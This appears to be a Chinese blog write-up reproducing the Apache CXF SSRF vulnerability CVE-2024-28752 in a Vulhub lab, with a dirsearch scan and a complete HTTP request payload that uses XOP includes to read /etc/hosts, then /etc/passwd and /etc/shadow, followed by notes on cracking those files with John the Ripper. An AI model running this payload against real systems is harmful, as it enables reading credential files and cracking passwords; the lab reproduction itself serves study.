Vulhub 中的 apache-cxf CVE-2024-28752

0x00 前言

声明:本文仅做学习交流,遵守《网络安全法》。

那么先学习漏洞原理吧,Apache CXF 是一个开源的服务框架,帮助开发者使用 JAX-WS 和 JAX-RS 等前端编程 API 构建和开发服务。

Apache CXF 在 4.0.4、3.6.3 和 3.5.8 版本之前存在一个使用 AegisDataBinding 的 SSRF 漏洞,该漏洞允许攻击者对接受至少一个任意类型参数的 Web 服务执行 SSRF 攻击。此漏洞专门影响使用 AegisDataBinding 的服务,而使用其他数据绑定 (包括默认数据绑定) 的服务不受影响。攻击者可以利用此漏洞通过让服务器向任意 URL发送请求来访问内部资源,这可能导致信息泄露或对内部系统的进一步攻击。

0x01 CVE-2024-28752

首先用nmap扫描一下端口。

用dirsearch 扫描一下。

复制代码
python3 dirsearch.py -u "http://192.168.217.166:8080/" -r

访问一下。

此事定有蹊跷!使用burp发送构造poc。

复制代码
POST /test HTTP/1.1
Host:192.168.217.166:8080
Content-Type: multipart/related; boundary=----kkkkkk123123213
Content-Length: 472
Connection: close

------kkkkkk123123213
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:test>
         <arg0>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/hosts"></xop:Include></count>
</arg0>
      </web:test>
   </soapenv:Body>
</soapenv:Envelope>
------kkkkkk123123213--

回显是base64加密的。

解个密。

那同理,可以修改poc查看/etc/passwd文件。

同理还可以看/etc/shadow文件。

到此,该漏洞复现完毕。

0x02 总结

其实呢,有了passwd和shadow文件之后,我有把这两个文件单独存档,通过unshadow命令进行整合之后,利用john the rapper进行密码破解。可惜了,查看到的shadow文件没有hash值,无法破解出密码。

简单的再记录一下使用john的过程。

首先,利用unshadow命令将passwd和shadow文件整合成一个文件,再利用john进行破解。

使用过程中出现"No password hashes loaded"的时候,需要指定john参数为crypt。

好吧,糊弄的密码被公之于众了。

相关推荐
TechWayfarer1 小时前
知乎/微博的IP属地显示为什么偶尔错误?用IP归属地查询平台自检工具3步验证
网络·python·网络协议·tcp/ip·网络安全
小江的记录本2 小时前
【网络安全】《网络安全常见攻击与防御》(附:《六大攻击核心特性横向对比表》)
java·网络·人工智能·后端·python·安全·web安全
其实防守也摸鱼3 小时前
无线网络安全---WLAN相关安全工具--kali(理论附题目)
linux·安全·web安全·学习笔记·kali·命令模式·wlan
2401_873479403 小时前
应急响应:勒索软件攻击源IP分析,如何通过IP地址查询定位辅助溯源?
网络·tcp/ip·安全·网络安全·ip
℡終嚸♂6805 小时前
FlowiseAI 任意文件上传 CTF Writeup
sql·web安全
white-persist6 小时前
【vulhub shiro 漏洞复现】vulhub shiro CVE-2016-4437 Shiro反序列化漏洞复现详细分析解释
运维·服务器·网络·python·算法·安全·web安全
2603_953527996 小时前
WordPress Finale Lite 插件高危漏洞检测与利用工具 (CVE-2024-30485)
前端·python·安全·web3·xss
腾讯安全应急响应中心8 小时前
AI安全,由攻入防|腾讯广告AI专项众测正式启动
人工智能·安全
不灭锦鲤8 小时前
网络安全学习第59天
学习·安全·web安全
上海云盾-小余8 小时前
DDoS 攻击应急响应全流程:从告警触发到业务恢复的黄金 15 分钟
服务器·安全·游戏·ddos